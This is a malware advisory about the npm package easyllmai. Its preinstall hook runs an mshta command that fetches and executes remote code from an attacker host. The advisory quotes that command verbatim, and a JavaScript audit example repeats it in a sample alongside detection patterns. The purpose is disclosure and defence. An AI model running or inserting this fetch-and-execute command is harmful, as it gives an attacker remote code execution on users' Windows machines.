MAL-2026-5895

Malicious code in easyllmai (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (2f3b4523b083331b34769a2a730586fa622f50560f2f237a893633e7ffb57872)

On `npm install`, the package's preinstall lifecycle hook (`"preinstall": "node preinstall.js"`) unconditionally runs `exec('cmd /c "mshta http://fixars.top"')`. On Windows, mshta is a living-off-the-land binary that fetches and executes arbitrary HTML Application / JScript / VBScript content from the supplied URL with the invoking user's privileges. The destination is plain HTTP, attacker-controlled, and the delivered payload is opaque remote code with no signature, hash, or version pinning — giving the publisher full remote code execution on any Windows machine that runs `npm install`. Package metadata is also a throwaway shape (empty `description`, empty `author`, no `repository`, no `keywords`) and the name `easyllmai` is consistent with a typosquat lure against legitimate LLM-client packages.
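A static pre-install check for the pattern described above, as an added example that is not part of the advisory or of any scanner's own code. The function name `auditPackage`, the rule ids, the rules other than the `mshta` match, and the sample manifests (with a placeholder URL) are assumptions constructed for illustration.

```javascript
// Static audit of an unpacked npm package for install-time hooks (added example).
const HOOKS = ["preinstall", "install", "postinstall"];
// mshta is the binary named in this advisory; the other two rules are assumed heuristics.
const RULES = [
  { id: "lolbin-mshta", re: /\bmshta(\.exe)?\b/i },
  { id: "plain-http-url", re: /\bhttp:\/\/[^\s"'`)]+/i },
  { id: "child-process-exec", re: /\b(exec|execSync|spawn|spawnSync)\s*\(/ },
];

// manifest: parsed package.json; files: { relativePath: sourceText } from the tarball.
function auditPackage(manifest, files) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    findings.push({ hook, rule: "install-hook-present", where: "package.json" });
    // Scan the hook command itself, then any script file it hands to node.
    const targets = [["package.json", cmd]];
    const m = /^\s*node\s+(?:\.\/)?(\S+)/.exec(cmd);
    if (m && typeof files[m[1]] === "string") targets.push([m[1], files[m[1]]]);
    for (const [where, text] of targets)
      for (const { id, re } of RULES)
        if (re.test(text)) findings.push({ hook, rule: id, where });
  }
  // Throwaway-metadata signal from the advisory: weak alone, useful next to a hook.
  const empty = (v) => v == null || v === "" || (Array.isArray(v) && v.length === 0);
  const blank = ["description", "author", "repository", "keywords"].filter((k) => empty(manifest[k]));
  if (blank.length === 4) findings.push({ hook: null, rule: "throwaway-metadata", where: "package.json" });
  return findings;
}

// Constructed sample mirroring the behaviour described above (placeholder URL).
const sampleManifest = {
  name: "sample-pkg", version: "1.0.0", description: "", author: "",
  scripts: { preinstall: "node preinstall.js" },
};
const sampleFiles = {
  "preinstall.js":
    "const { exec } = require('child_process');\n" +
    "exec('cmd /c \"mshta http://example.invalid\"');\n",
};
const benignManifest = {
  name: "benign-pkg", description: "x", author: "a", repository: "r", keywords: ["k"],
  scripts: { test: "node test.js" },
};

console.log(auditPackage(sampleManifest, sampleFiles).map((f) => f.rule));
```

Run it against the manifest and files of a tarball fetched with `npm pack <name>` before installing; `npm install --ignore-scripts` keeps lifecycle hooks from running while a dependency is still under review.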

Affected packages

npm / easyllmai

No fixed version published yet for easyllmai (npm). Pin to a known-safe version or switch to an alternative.
